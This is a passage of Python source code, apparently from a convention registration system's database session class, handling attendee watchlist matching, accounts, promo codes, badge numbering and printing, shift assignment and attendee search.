'relevant': attendee.can_admin_checklist,\n 'completed': attendee.checklist_item_for_slug(conf.slug)\n }\n\n def jobs_for_signups(self, all=False):\n fields = [\n 'name', 'department_id', 'department_name', 'description',\n 'weight', 'start_time_local', 'end_time_local', 'duration',\n 'weighted_hours', 'restricted', 'extra15', 'taken',\n 'visibility', 'is_public', 'is_setup', 'is_teardown']\n jobs = self.logged_in_volunteer().possible_and_current\n restricted_minutes = set()\n for job in jobs:\n if job.required_roles:\n restricted_minutes.add(frozenset(job.minutes))\n if all:\n return [job.to_dict(fields) for job in jobs]\n return [\n job.to_dict(fields)\n for job in jobs if (job.required_roles or frozenset(job.minutes) not in restricted_minutes)]\n\n def possible_match_list(self):\n possibles = defaultdict(list)\n for a in self.valid_attendees():\n possibles[a.email.lower()].append(a)\n possibles[a.first_name, a.last_name].append(a)\n return possibles\n\n def guess_attendee_watchentry(self, attendee, active=True):\n \"\"\"\n Finds all watchlist entries that match a given attendee.\n Only active entries are matched. Watchlist entries with confirmed attendees\n are still matched to attendees -- otherwise attendees could dodge bans just by\n registering twice.\n\n A watchlist entry is considered a match if both of the following are true:\n a) one of the entry's first names or its last name matches the attendee's\n b) the entry's email address or date of birth matches the attendee's\n\n Because this could be run while in the middle of creating an attendee, we\n need to do several checks on how the attendee's DOB might be formatted.\n \"\"\"\n or_clauses = [\n and_(\n WatchList.email != '',\n func.lower(WatchList.email) == attendee.email.lower())]\n\n if attendee.birthdate:\n if isinstance(attendee.birthdate, six.string_types):\n try:\n birthdate = dateparser.parse(attendee.birthdate).date()\n except Exception:\n log.debug('Error parsing attendee birthdate: {}'.format(attendee.birthdate))\n else:\n or_clauses.append(WatchList.birthdate == birthdate)\n elif isinstance(attendee.birthdate, datetime):\n or_clauses.append(WatchList.birthdate == attendee.birthdate.date())\n elif isinstance(attendee.birthdate, date):\n or_clauses.append(WatchList.birthdate == attendee.birthdate)\n\n return self.query(WatchList).filter(and_(\n or_(func.lower(WatchList.first_names).contains(attendee.first_name.lower()),\n func.lower(WatchList.last_name) == attendee.last_name.lower()),\n or_(*or_clauses),\n WatchList.active == active)).all() # noqa: E712\n\n def guess_watchentry_attendees(self, entry):\n return self.query(Attendee).filter(\n or_(func.lower(Attendee.first_name).in_(entry.first_name_list),\n func.lower(Attendee.last_name) == entry.last_name.lower()),\n or_(and_(\n Attendee.email != '',\n func.lower(Attendee.email) == entry.email.lower()\n ),\n and_(\n Attendee.birthdate != None,\n Attendee.birthdate == entry.birthdate\n ),\n ),\n Attendee.watchlist_id == None).all()\n\n def get_attendee_account_by_email(self, email):\n return self.query(AttendeeAccount).filter_by(normalized_email=normalize_email_legacy(email)).one()\n\n def get_admin_account_by_email(self, email):\n from uber.utils import normalize_email_legacy\n return self.query(AdminAccount).join(Attendee).filter(Attendee.normalized_email == normalize_email_legacy(email)).one()\n\n def no_email(self, subject):\n return not self.query(Email).filter_by(subject=subject).all()\n\n def lookup_attendee(self, first_name, last_name, email, zip_code):\n attendees = self.query(Attendee).iexact(\n first_name=first_name,\n last_name=last_name,\n zip_code=zip_code\n ).filter(\n Attendee.normalized_email == normalize_email_legacy(email),\n Attendee.is_valid == True\n ).limit(10).all()\n\n if attendees:\n statuses = defaultdict(lambda: six.MAXSIZE, {\n c.COMPLETED_STATUS: 0,\n c.NEW_STATUS: 1,\n c.REFUNDED_STATUS: 2,\n c.DEFERRED_STATUS: 3,\n c.WATCHED_STATUS: 4,\n c.UNAPPROVED_DEALER_STATUS: 5,\n c.NOT_ATTENDING: 6})\n\n attendees = sorted(\n attendees, key=lambda a: statuses[a.badge_status])\n return attendees[0]\n\n raise ValueError('Attendee not found')\n\n def create_or_find_attendee_by_id(self, **params):\n message = ''\n if params.get('attendee_id', ''):\n try:\n attendee = self.attendee(id=params['attendee_id'])\n except Exception:\n try:\n attendee = self.attendee(public_id=params['attendee_id'])\n except Exception:\n return \\\n None, \\\n 'The confirmation number you entered is not valid, ' \\\n 'or there is no matching badge.'\n\n if not attendee.is_valid:\n return None, \\\n 'This badge is invalid. Please contact registration.'\n else:\n attendee_params = {\n attr: params.get(attr, '')\n for attr in ['first_name', 'last_name', 'email']}\n attendee = self.attendee(attendee_params, restricted=True,\n ignore_csrf=True)\n attendee.placeholder = True\n if not params.get('email', ''):\n message = 'Email address is a required field.'\n elif c.ATTENDEE_ACCOUNTS_ENABLED:\n if self.current_attendee_account():\n self.add_attendee_to_account(attendee, self.current_attendee_account())\n else:\n password = params.get('account_password')\n if password and password != params.get('confirm_password'):\n message = 'Password confirmation does not match.'\n else:\n message = valid_password(password) or valid_email(params.get('email', ''))\n if not message:\n new_account = self.create_attendee_account(params.get('email', ''), password=password)\n self.add_attendee_to_account(attendee, new_account)\n cherrypy.session['attendee_account_id'] = new_account.id\n return attendee, message\n\n def create_admin_account(self, attendee, password='', generate_pwd=True, **params):\n from uber.utils import genpasswd\n\n if not password and generate_pwd:\n password = genpasswd()\n \n new_account = AdminAccount(attendee=attendee, hashed=bcrypt.hashpw(password, bcrypt.gensalt()))\n if 'judge' in params:\n new_account.judge = params.pop('judge')\n new_account.apply(params)\n self.add(new_account)\n return new_account\n\n def create_attendee_account(self, email=None, password=None):\n from uber.models import AttendeeAccount\n from uber.utils import normalize_email\n\n new_account = AttendeeAccount(email=normalize_email(email), hashed=bcrypt.hashpw(password, bcrypt.gensalt()) if password else '')\n self.add(new_account)\n\n return new_account\n\n def add_attendee_to_account(self, attendee, account):\n from uber.utils import normalize_email\n\n unclaimed_account = account.hashed != '' and not account.is_sso_account\n\n if c.ONE_MANAGER_PER_BADGE and attendee.managers and not unclaimed_account:\n attendee.managers.clear()\n if attendee not in account.attendees:\n account.attendees.append(attendee)\n\n def match_attendee_to_account(self, attendee):\n existing_account = self.query(AttendeeAccount).filter_by(normalized_email=normalize_email_legacy(attendee.email)).first()\n if existing_account:\n self.add_attendee_to_account(attendee, existing_account)\n\n def get_receipt_by_model(self, model, include_closed=False, create_if_none=\"\"):\n receipt_select = self.query(ModelReceipt).filter_by(owner_id=model.id, owner_model=model.__class__.__name__)\n if not include_closed:\n receipt_select = receipt_select.filter(ModelReceipt.closed == None)\n receipt = receipt_select.first()\n\n if not receipt and create_if_none:\n receipt, receipt_items = ReceiptManager.create_new_receipt(model, create_model=True)\n\n self.add(receipt)\n if create_if_none != \"BLANK\":\n self.add_all(receipt_items)\n self.commit()\n return receipt\n\n def get_model_by_receipt(self, receipt):\n cls = getattr(uber.models, receipt.owner_model)\n if cls:\n return self.query(cls).filter_by(id=receipt.owner_id).first()\n\n def refresh_receipt_and_model(self, model):\n receipt = self.get_receipt_by_model(model)\n if receipt:\n for txn in receipt.pending_txns:\n txn.check_paid_from_stripe()\n self.refresh(receipt)\n \n try:\n self.refresh(model)\n except sqlalchemy.exc.InvalidRequestError:\n # Non-persistent object, so nothing to refresh\n pass\n return receipt\n\n def attendee_from_marketplace_app(self, **params):\n attendee, message = self.create_or_find_attendee_by_id(**params)\n if message:\n return attendee, message\n elif attendee.marketplace_applications:\n return attendee, \\\n 'There is already a marketplace application ' \\\n 'for that badge!'\n\n return attendee, message\n \n def attendee_from_art_show_app(self, **params):\n attendee, message = self.create_or_find_attendee_by_id(**params)\n if message:\n return attendee, message\n elif attendee.art_show_applications:\n return attendee, \\\n 'There is already an art show application ' \\\n 'for that badge!'\n\n if params.get('not_attending', ''):\n attendee.badge_status = c.NOT_ATTENDING\n\n return attendee, ''\n\n def lookup_agent_code(self, code):\n return self.query(ArtShowApplication).filter_by(agent_code=code).all()\n\n def add_promo_code_to_attendee(self, attendee, code, used_codes=defaultdict(int)):\n \"\"\"\n Convenience method for adding a promo code to an attendee.\n\n This method sets both the `promo_code` and `promo_code_id`\n properties of `attendee`. Due to the way the `Attendee.promo_code`\n relationship is defined, the `Attendee.promo_code_id` isn't\n automatically set, which makes this method a nice way of setting\n both.\n\n Arguments:\n attendee (Attendee): The Attendee for which the promo code\n should be added.\n code (str): The promo code as typed by an end user, or an\n empty string to unset the promo code.\n used_codes (defaultdict(int)): A list of codes already used\n but not added to the session, e.g., in PreregCart.\n These codes are flattened to the list, as they're only\n used here to check for used PromoCodeGroup codes.\n\n Returns:\n str: Either a failure message or an empty string\n indicating success.\n \"\"\"\n code = code.strip() if code else ''\n if code:\n attendee.promo_code = self.lookup_promo_code(code, list(used_codes.keys()))\n if attendee.promo_code:\n attendee.promo_code_id = attendee.promo_code.id\n return ''\n else:\n attendee.promo_code_id = None\n return 'The promo code you entered is invalid.'\n else:\n attendee.promo_code = None\n attendee.promo_code_id = None\n return ''\n\n def lookup_promo_code(self, code, used_codes=[]):\n \"\"\"\n Convenience method for finding a promo code by id or code.\n Accounts for PromoCodeGroups.\n\n Arguments:\n code (str): The id or code to search for.\n\n Returns:\n PromoCode: A PromoCode object, either matching\n the given code or found in the matching PromoCodeGroup.\n \"\"\"\n promo_code = self.lookup_promo_or_group_code(code, PromoCode)\n if promo_code:\n return promo_code\n\n group = self.lookup_promo_or_group_code(code, PromoCodeGroup)\n if group:\n unused_valid_codes = [code for code in group.valid_codes if code.code not in used_codes]\n return unused_valid_codes[0] if unused_valid_codes else None\n\n def lookup_promo_or_group_code(self, code, model=PromoCode):\n \"\"\"\n Convenience method for finding a promo code by id or code.\n\n Arguments:\n model: Either PromoCode or PromoCodeGroup\n code (str): The id or code to search for.\n\n Returns:\n Either the matching object of the given model,\n or None if not found.\n \"\"\"\n if isinstance(code, uuid.UUID):\n code = code.hex\n\n normalized_code = PromoCode.normalize_code(code)\n if not normalized_code:\n return None\n\n unambiguous_code = PromoCode.disambiguate_code(code)\n clause = or_(model.normalized_code == normalized_code, model.normalized_code == unambiguous_code)\n\n # Make sure that code is a valid UUID before adding\n # PromoCode.id to the filter clause\n try:\n promo_code_id = uuid.UUID(normalized_code).hex\n except Exception:\n pass\n else:\n clause = clause.or_(model.id == promo_code_id)\n\n return self.query(model).filter(clause).order_by(model.normalized_code.desc()).first()\n\n def create_promo_code_group(self, attendee, name, badges, cost=None):\n pc_group = PromoCodeGroup(name=name, buyer=attendee)\n\n self.add_codes_to_pc_group(pc_group, badges, cost)\n\n return pc_group\n\n def add_codes_to_pc_group(self, pc_group, badges, cost=None):\n cost = c.get_group_price() if cost is None else cost\n for _ in range(badges):\n self.add(PromoCode(\n discount=0,\n discount_type=PromoCode._FIXED_PRICE,\n uses_allowed=1,\n group=pc_group,\n cost=cost))\n \n def remove_codes_from_pc_group(self, pc_group, badges):\n codes = sorted(pc_group.promo_codes, key=lambda x: x.cost, reverse=True)\n for _ in range(badges):\n code = codes.pop()\n self.delete(code)\n pc_group.promo_codes.remove(code)\n\n def add_to_print_queue(self, attendee, printer_id, reg_station, print_fee=None, dry_run=False):\n from uber.models import PrintJob\n fields = [\n 'badge_printed_name',\n 'badge_num',\n 'badge_type_label',\n 'ribbon_labels',\n ]\n \n errors = []\n if not printer_id:\n errors.append(\"Printer ID not set.\")\n\n if not reg_station:\n errors.append(\"Reg station number not set.\")\n\n if print_fee is None and attendee.times_printed > 0:\n errors.append(\"Please specify what reprint fee to charge this attendee, including $0.\")\n \n if not attendee.birthdate:\n errors.append(\"Attendee is missing a date of birth.\")\n elif not attendee.age_now_or_at_con:\n errors.append(\"Attendee's date of birth is not recognized as a date.\")\n\n attendee_fields = attendee.to_dict(fields)\n\n for field in fields:\n if not attendee_fields.get(field) and field != 'ribbon_labels':\n errors.append(\"Field missing: {}.\".format(field))\n\n if self.query(PrintJob).filter_by(attendee_id=attendee.id, printed=None, errors=\"\").first():\n errors.append(\"Badge is already queued to print.\")\n\n if errors:\n return None, errors\n\n if dry_run:\n return None, None\n\n print_job = PrintJob(attendee_id = attendee.id, \n admin_id = self.current_admin_account().id,\n admin_name = self.admin_attendee().full_name,\n printer_id = printer_id,\n reg_station = reg_station,\n print_fee = print_fee)\n\n if attendee.age_now_or_at_con >= 18:\n print_job.is_minor = False\n else:\n print_job.is_minor = True\n \n json_data = attendee_fields\n del json_data['_model']\n json_data['attendee_id'] = json_data.pop('id')\n print_job.json_data = json_data\n \n self.add(print_job)\n self.commit()\n\n return print_job.id, None\n\n def update_badge_print_job(self, id):\n job = self.print_job(id)\n attendee = job.attendee\n\n errors = []\n\n if attendee.age_group_conf['val'] == c.AGE_UNKNOWN:\n errors.append(\"Attendee no longer has an age group.\")\n else:\n if attendee.age_now_or_at_con < 18 and not job.is_minor:\n errors.append(\"Attendee is now under 18, please requeue badge.\")\n if attendee.age_now_or_at_con >= 18 and job.is_minor:\n errors.append(\"Attendee is no longer under 18, please requeue badge.\")\n \n fields = ['badge_num', 'badge_type_label', 'ribbon_labels', 'badge_printed_name']\n attendee_fields = attendee.to_dict(fields)\n\n for field in fields:\n if not attendee_fields.get(field) and field != 'ribbon_labels':\n errors.append(\"Field missing: {}.\".format(field))\n elif attendee_fields.get(field) != job.json_data.get(field):\n job.json_data[field] = attendee_fields.get(field)\n\n if not errors:\n self.add(job)\n self.commit()\n\n return errors\n\n def get_next_badge_num(self, badge_type):\n \"\"\"\n Returns the next badge available for a given badge type. This is\n essentially a wrapper for auto_badge_num that accounts for new or\n changed objects in the session.\n\n Args:\n badge_type: Used to pass to auto_badge_num and to ignore\n objects in the session that aren't within the badge\n type's range.\n\n \"\"\"\n badge_type = uber.badge_funcs.get_real_badge_type(badge_type)\n\n new_badge_num = self.auto_badge_num(badge_type)\n lower_bound = c.BADGE_RANGES[badge_type][0]\n upper_bound = c.BADGE_RANGES[badge_type][1]\n\n # Adjusts the badge number based on badges in the session\n all_models = chain(self.new, self.dirty)\n for attendee in [m for m in all_models if isinstance(m, Attendee)]:\n if attendee.badge_num is not None and lower_bound <= attendee.badge_num <= upper_bound:\n new_badge_num = max(new_badge_num, 1 + attendee.badge_num)\n\n assert new_badge_num < upper_bound, 'There are no more badge numbers available in this range!'\n\n return new_badge_num\n\n def update_badge(self, attendee, old_badge_type, old_badge_num):\n \"\"\"\n This should be called whenever an attendee's badge type or badge\n number is changed. It checks if the attendee will still require a\n badge number with their new badge type, and if so, sets their\n number to either the number specified by the admin or the lowest\n available badge number in that range.\n\n Args:\n attendee: The Attendee() object whose badge is being changed.\n old_badge_type: The old badge type.\n old_badge_num: The old badge number.\n\n \"\"\"\n from uber.badge_funcs import needs_badge_num\n\n if c.SHIFT_CUSTOM_BADGES and c.BEFORE_PRINTED_BADGE_DEADLINE and not c.AT_THE_CON:\n badge_collision = False\n if attendee.badge_num:\n badge_collision = self.query(Attendee.badge_num).filter(\n Attendee.badge_num == attendee.badge_num,\n Attendee.id != attendee.id).first()\n\n desired_badge_num = attendee.badge_num\n if old_badge_num:\n if attendee.badge_num and badge_collision:\n if old_badge_type == attendee.badge_type:\n if old_badge_num < attendee.badge_num:\n self.shift_badges(\n old_badge_type, old_badge_num + 1, until=attendee.badge_num, down=True)\n else:\n self.shift_badges(old_badge_type, attendee.badge_num, until=old_badge_num - 1, up=True)\n else:\n self.shift_badges(old_badge_type, old_badge_num + 1, down=True)\n self.shift_badges(attendee.badge_type, attendee.badge_num, up=True)\n else:\n self.shift_badges(old_badge_type, old_badge_num + 1, down=True)\n\n elif attendee.badge_num and badge_collision:\n self.shift_badges(attendee.badge_type, attendee.badge_num, up=True)\n\n attendee.badge_num = desired_badge_num\n\n if not attendee.badge_num and needs_badge_num(attendee):\n attendee.badge_num = self.get_next_badge_num(attendee.badge_type)\n\n return 'Badge updated'\n\n def auto_badge_num(self, badge_type):\n \"\"\"\n Gets the next available badge number for a badge type's range.\n\n Plugins can override the logic here if need be without worrying\n about handling dirty sessions.\n\n Args:\n badge_type: Used as a starting point if no badges of the same\n type exist, and to select badges within a specific range.\n\n \"\"\"\n in_range = self.query(Attendee.badge_num).filter(\n Attendee.badge_num != None, # noqa: E711\n Attendee.badge_num >= c.BADGE_RANGES[badge_type][0],\n Attendee.badge_num <= c.BADGE_RANGES[badge_type][1])\n\n in_range_list = [int(row[0]) for row in in_range.order_by(Attendee.badge_num)]\n\n if len(in_range_list):\n # Searches badge range for a gap in badge numbers; if none\n # found, returns the latest badge number + 1.\n # Doing this lets admins manually set high badge numbers\n # without filling up the badge type's range.\n start, end = c.BADGE_RANGES[badge_type][0], in_range_list[-1]\n gap_nums = sorted(set(range(start, end + 1)).difference(in_range_list))\n\n if not gap_nums:\n return end + 1\n else:\n return gap_nums[0]\n else:\n return c.BADGE_RANGES[badge_type][0]\n\n def shift_badges(self, badge_type, badge_num, *, until=None, up=False, down=False):\n\n if not c.SHIFT_CUSTOM_BADGES or c.AFTER_PRINTED_BADGE_DEADLINE or c.AT_THE_CON:\n return False\n\n from uber.badge_funcs import get_badge_type\n (calculated_badge_type, error) = get_badge_type(badge_num)\n badge_type = calculated_badge_type or badge_type\n until = until or c.BADGE_RANGES[badge_type][1]\n\n shift = 1 if up else -1\n query = self.query(Attendee).filter(\n Attendee.badge_num != None, # noqa: E711\n Attendee.badge_num >= badge_num,\n Attendee.badge_num <= until)\n\n query.update({Attendee.badge_num: Attendee.badge_num + shift}, synchronize_session='evaluate')\n\n return True\n \n def get_next_badge_to_print(self, printer_id=''):\n query = self.query(PrintJob).join(Tracking, PrintJob.id == Tracking.fk_id).filter(\n PrintJob.printed == None, PrintJob.errors == '', PrintJob.printer_id == printer_id)\n\n badge = query.order_by(Tracking.when.desc()).with_for_update().first()\n\n return badge\n\n def valid_attendees(self):\n return self.query(Attendee).filter(Attendee.is_valid == True)\n\n def attendees_with_badges(self):\n return self.query(Attendee).filter(Attendee.has_badge == True)\n\n def all_attendees(self, only_staffing=False, pending=False):\n \"\"\"\n Returns a Query of Attendees with efficient loading for groups and\n shifts/jobs.\n\n In some cases we only want to return attendees where \"staffing\"\n is true, because before the event people can't sign up for shifts\n unless they're marked as volunteers. However, on-site we relax\n that restriction, so we'll get attendees with shifts who are not\n actually marked as staffing. We therefore have an optional\n parameter for clients to indicate that all attendees should be\n returned.\n \"\"\"\n staffing_filter = [Attendee.staffing == True] if only_staffing else [] # noqa: E712\n\n badge_statuses = [c.NEW_STATUS, c.COMPLETED_STATUS]\n if pending:\n badge_statuses.append(c.PENDING_STATUS)\n\n badge_filter = Attendee.badge_status.in_(badge_statuses)\n\n return self.query(Attendee) \\\n .filter(badge_filter, *staffing_filter) \\\n .options(\n subqueryload(Attendee.dept_memberships),\n subqueryload(Attendee.group),\n subqueryload(Attendee.shifts).subqueryload(Shift.job).subqueryload(Job.department),\n subqueryload(Attendee.room_assignments)) \\\n .order_by(Attendee.full_name, Attendee.id)\n\n def staffers(self, pending=False):\n return self.all_attendees(only_staffing=True, pending=pending)\n\n def all_panelists(self):\n return self.query(Attendee).filter(or_(\n Attendee.ribbon.contains(c.PANELIST_RIBBON),\n Attendee.badge_type == c.GUEST_BADGE)).order_by(Attendee.full_name).all()\n\n @department_id_adapter\n def jobs(self, department_id=None):\n job_filter = {'department_id': department_id} if department_id else {}\n\n return self.query(Job).filter_by(**job_filter) \\\n .options(\n subqueryload(Job.department),\n subqueryload(Job.required_roles),\n subqueryload(Job.shifts).subqueryload(Shift.attendee).subqueryload(Attendee.group)) \\\n .order_by(Job.start_time, Job.name)\n\n def staffers_for_dropdown(self):\n query = self.query(Attendee.id, Attendee.full_name)\n return [\n {'id': id, 'full_name': full_name.title()}\n for id, full_name in query.filter_by(staffing=True).order_by(Attendee.full_name)]\n\n @department_id_adapter\n def dept_heads(self, department_id=None):\n if department_id:\n return self.query(Department).get(department_id).dept_heads\n return self.query(Attendee).filter(Attendee.dept_memberships.any(is_dept_head=True)) \\\n .order_by(Attendee.full_name).all()\n\n def match_to_group(self, attendee, group):\n available = [a for a in group.attendees if a.is_unassigned]\n if not available:\n return 'The last badge for that group has already been assigned by another station'\n\n matching = [a for a in available if a.badge_type == attendee.badge_type]\n if not matching:\n return 'Badge #{} is a {} badge, but {} has no badges of that type'.format(\n attendee.badge_num, attendee.badge_type_label, group.name)\n else:\n # First preserve the attributes to copy to the new group member\n attrs = matching[0].to_dict(attrs=['group', 'group_id', 'paid', 'ribbon'])\n\n # Then delete the old unassigned group member\n self.delete(matching[0])\n\n # Flush the deletion so the badge shifting code is performed\n self.flush()\n\n # Copy the attributes we preserved\n attendee.apply(attrs, restricted=False)\n\n # Ensure the attendee is added to the session\n self.add(attendee)\n self.commit()\n\n def get_truth(self, left, op, right):\n # Helper function for use in attribute and property search\n return op(left, right)\n\n def parse_attr_search_terms(self, search_text):\n # Parse the search terms, including accounting for prefixes like >, <, and !=\n # Returns the target attr/property name, the search term with and without AND/OR, and the operator\n target, term = search_text.split(':', 1)\n target, term = target.strip(), term.strip()\n search_term = term.replace('AND', '').replace('OR', '').strip()\n\n if search_term[0] in ['>', '<', '!']:\n if search_term[0] == '!':\n op = operator.ne\n\n if search_term[1] == '=':\n if search_term[0] == '>':\n op = operator.ge\n elif search_term[0] == '<':\n op = operator.le\n search_term = search_term[2:]\n else:\n if search_term[0] == '>':\n op = operator.gt\n elif search_term[0] == '<':\n op = operator.lt\n search_term = search_term[1:]\n else:\n op = operator.eq\n \n return target, term, search_term, op\n\n def search(self, text, *filters):\n # We need to both outerjoin on the PromoCodeGroup table and also\n # query it. In order to do this we need to alias it so that the\n # reference to PromoCodeGroup in the joinedload doesn't conflict\n # with the outerjoin. See https://docs.sqlalchemy.org/en/13/orm/query.html#sqlalchemy.orm.query.Query.join\n aliased_pcg = aliased(PromoCodeGroup)\n\n attendees = self.query(Attendee) \\\n .outerjoin(Attendee.group) \\\n .outerjoin(Attendee.promo_code) \\\n .outerjoin(Attendee.managers) \\\n .outerjoin(aliased_pcg, PromoCode.group) \\\n .options(\n joinedload(Attendee.group),\n joinedload(Attendee.promo_code).joinedload(PromoCode.group)\n ).filter(*filters)\n\n terms = text.split()\n if len(terms) == 2:\n first, last = terms\n if first.endswith(','):\n last, first = first.strip(','), last\n name_cond = attendees.icontains_condition(first_name=first, last_name=last)\n legal_name_cond = attendees.icontains_condition(legal_name=\"{}%{}\".format(first, last))\n first_name_cond = attendees.icontains_condition(first_name=terms)\n last_name_cond = attendees.icontains_condition(last_name=terms)\n if attendees.filter(or_(name_cond, legal_name_cond, first_name_cond, last_name_cond)).first():\n return attendees.filter(or_(name_cond, legal_name_cond, first_name_cond, last_name_cond)), ''\n\n elif len(terms) == 1 and terms[0].endswith(','):\n last = terms[0].rstrip(',')\n name_cond = attendees.icontains_condition(last_name=last)\n # Known issue: search includes first name if legal name is set\n legal_cond = attendees.icontains_condition(legal_name=last)\n return attendees.filter(or_(name_cond, legal_cond)), ''\n\n elif len(terms) == 1 and terms[0].isdigit():\n if len(terms[0]) == 10:\n return attendees.filter(or_(Attendee.ec_phone == terms[0], Attendee.cellphone == terms[0])), ''\n elif int(terms[0]) <= sorted(\n c.BADGE_RANGES.items(),\n key=lambda badge_range: badge_range[1][0])[-1][1][1]:\n return attendees.filter(Attendee.badge_num == terms[0]), ''\n\n elif len(terms) == 1 \\\n and re.match('^[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}$', terms[0]):\n\n return attendees.filter(or_(\n Attendee.id == terms[0],\n Attendee.public_id == terms[0],\n aliased_pcg.id == terms[0],\n Group.id == terms[0],\n Group.public_id == terms[0])), ''\n\n elif len(terms) == 1 and terms[0].startswith(c.EVENT_QR_ID):\n search_uuid = terms[0][len(c.EVENT_QR_ID):]\n if re.match('^[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}$', search_uuid):\n return attendees.filter(or_(\n Attendee.public_id == search_uuid,\n Group.public_id == search_uuid)), ''\n\n or_checks = []\n and_checks = []\n\n def check_text_fields(search_text):\n check_list = [\n Group.name.ilike('%' + search_text + '%'),\n aliased_pcg.name.ilike('%' + search_text + '%')\n ]\n\n for attr in Attendee.searchable_fields:\n check_list.append(getattr(Attendee, attr).ilike('%' + search_text + '%'))\n \n return check_list\n\n if ':' in text:\n delimited_text = text.replace('AND', 'AND,').replace('OR', 'OR,')\n list_of_attr_searches = delimited_text.split(',')\n last_term = None\n\n for search_text in list_of_attr_searches:\n if ':' not in search_text:\n last_term = search_text\n search_text = search_text.replace('AND', '').replace('OR', '').strip()\n or_checks.extend(check_text_fields(search_text))\n else:\n target, term, search_term, op = self.parse_attr_search_terms(search_text)\n\n if target == 'email':\n attr_search_filter = Attendee.normalized_email.contains(normalize_email_legacy(search_term))\n elif target == 'account_email':\n attr_search_filter = AttendeeAccount.normalized_email.contains(normalize_email_legacy(search_term))\n elif target == 'group':\n attr_search_filter = Group.normalized_name.contains(search_term.strip().lower())\n elif target == 'has_ribbon':\n attr_search_filter = Attendee.ribbon == Attendee.ribbon.type.convert_if_labels(search_term.title())\n elif target in Attendee.searchable_bools:\n t_or_f = search_term.strip().lower() not in ('f', 'false', 'n', 'no', '0', 'none')\n attr_search_filter = getattr(Attendee,target) == t_or_f\n\n if not isinstance(getattr(Attendee, target).type, Boolean):\n attr_search_filter = getattr(Attendee,target) != None \\\n if t_or_f == True else getattr(Attendee,target) == None\n elif target in Attendee.searchable_choices:\n if target == 'amount_extra':\n # Allow searching kick-in by dollar value and not just the label\n try:\n search_term = int(search_term.replace('$',''))\n except:\n pass\n else:\n try:\n search_term = getattr(Attendee,target).type.convert_if_label(search_term)\n except KeyError:\n # A lot of our labels are title-cased\n try:\n search_term = getattr(Attendee,target).type.convert_if_label(search_term.title())\n except KeyError:\n return None, 'ERROR: {} is not a valid option for {}'.format(search_term, target)\n attr_search_filter = self.get_truth(getattr(Attendee,target), op, search_term)\n else:\n try:\n getattr(Attendee,target)\n except AttributeError:\n return None, 'ERROR: {} is not a valid attribute'.format(target)\n # Are we a searchable property?\n if isinstance(getattr(Attendee,target) == search_term, sqlalchemy.sql.elements.BinaryExpression):\n attr_search_filter = self.get_truth(getattr(Attendee,target), op, search_term)\n else:\n return None, 'ERROR: {} is not a searchable attribute'.format(target)\n \n if term.endswith(' OR') or last_term and last_term.endswith(' OR'):\n or_checks.append(attr_search_filter)\n else:\n and_checks.append(attr_search_filter)\n\n last_term = term\n else:\n or_checks.extend(check_text_fields(text))\n \n if or_checks and and_checks:\n return attendees.filter(or_(*or_checks), and_(*and_checks)), ''\n elif or_checks:\n return attendees.filter(or_(*or_checks)), ''\n elif and_checks:\n return attendees.filter(and_(*and_checks)), ''\n else:\n return attendees, ''\n\n def property_search(self, text):\n \"\"\"\n Many of our most useful forms of data are properties on the Attendee model.\n However, these often are too complex to create SQL statements for, so we\n can't use them in regular attendee attribute search. Our workaround for this\n has been either creating custom reports or making sysadmins cry. This is our\n quick-ish solution -- a way to filter attendees by any property. Because this is\n resource-intensive, it is locked behind the Devtools site section.\n \"\"\"\n if \"OR\" in text:\n return None, 'Sorry, property search does not support OR conditions due to I don\\'t want to install Pandas.'\n delimited_text = text.replace('AND', 'AND,')\n list_of_attr_searches = delimited_text.split(',')\n last_term = None\n\n conditions_list = []\n results = []\n\n for search_text in list_of_attr_searches:\n target, term, search_term, op = self.parse_attr_search_terms(search_text)\n try:\n search_term = int(search_term)\n except Exception as ex:\n pass\n conditions_list.append((target, search_term, op))\n\n for attendee in self.valid_attendees():\n if all([self.get_truth(getattr(attendee, target), op, search_term) for target, search_term, op in conditions_list]):\n results.append(attendee)\n \n return results, ''\n\n def delete_from_group(self, attendee, group):\n \"\"\"\n Sometimes we want to delete an attendee badge which is part of a\n group. In most cases, we could just say \"session.delete(attendee)\"\n but sometimes we need to make sure that the attendee is ALSO\n removed from the \"group.attendees\" list before we commit, since the\n number of attendees in a group is used in our presave_adjustments()\n code to update the group price. So anytime we delete an attendee\n in a group, we should use this method.\n \"\"\"\n self.delete(attendee)\n group.attendees.remove(attendee)\n\n def assign_badges(\n self, group, new_badge_count, new_badge_type=c.ATTENDEE_BADGE,\n new_ribbon_type=None, paid=c.PAID_BY_GROUP,\n **extra_create_args):\n\n diff = int(new_badge_count) - group.badges\n sorted_unassigned = sorted(group.floating, key=lambda a: a.registered, reverse=True)\n ribbon_to_use = ','.join(map(str, listify(new_ribbon_type))) if new_ribbon_type else group.new_ribbon\n\n if int(new_badge_type) in c.PREASSIGNED_BADGE_TYPES and c.AFTER_PRINTED_BADGE_DEADLINE and diff > 0:\n return 'Custom badges have already been ordered, so you will need to select a different badge type'\n elif diff > 0:\n for i in range(diff):\n new_attendee = Attendee(\n badge_type=new_badge_type,\n ribbon=ribbon_to_use,\n paid=paid,\n **extra_create_args)\n group.attendees.append(new_attendee)\n \n elif diff < 0:\n if len(group.floating) < abs(diff):\n return 'You cannot reduce the number of badges for a group to below the number of assigned badges'\n else:\n for attendee in sorted_unassigned[:abs(diff)]:\n self.delete_from_group(attendee, group)\n\n def assign(self, attendee_id, job_id):\n \"\"\"\n assign an Attendee to a Job by creating a Shift\n :return: 'None' on success, error message on failure\n \"\"\"\n job = self.job(job_id)\n attendee = self.attendee(attendee_id)\n\n if not attendee.has_required_roles(job):\n return 'You cannot assign an attendee to this shift who does not have the required roles: {}'.format(\n job.required_roles_labels)\n\n if job.slots <= len(job.shifts):\n return 'All slots for this job have already been filled'\n\n if not job.no_overlap(attendee):\n return 'This volunteer is already signed up for a shift during that time'\n\n if not job.working_limit_ok(attendee):\n return 'This shift would put this volunteer over one of their department\\'s max consecutive hours'\n\n self.add(Shift(attendee=attendee, job=job))\n self.commit()\n\n def insert_test_admin_account(self):\n \"\"\"\n Insert a test admin into the database with username\n \"magfest@example.com\" password \"magfest\" this is ONLY allowed if\n no other admins already exist in the database.\n\n Returns:\n bool: True if success, False if failure\n \"\"\"\n if self.query(AdminAccount).first() is not None:\n return False\n\n attendee = Attendee(\n placeholder=True,\n first_name='Test',\n last_name='Developer',\n email=c.TEST_ADMIN_EMAIL,\n 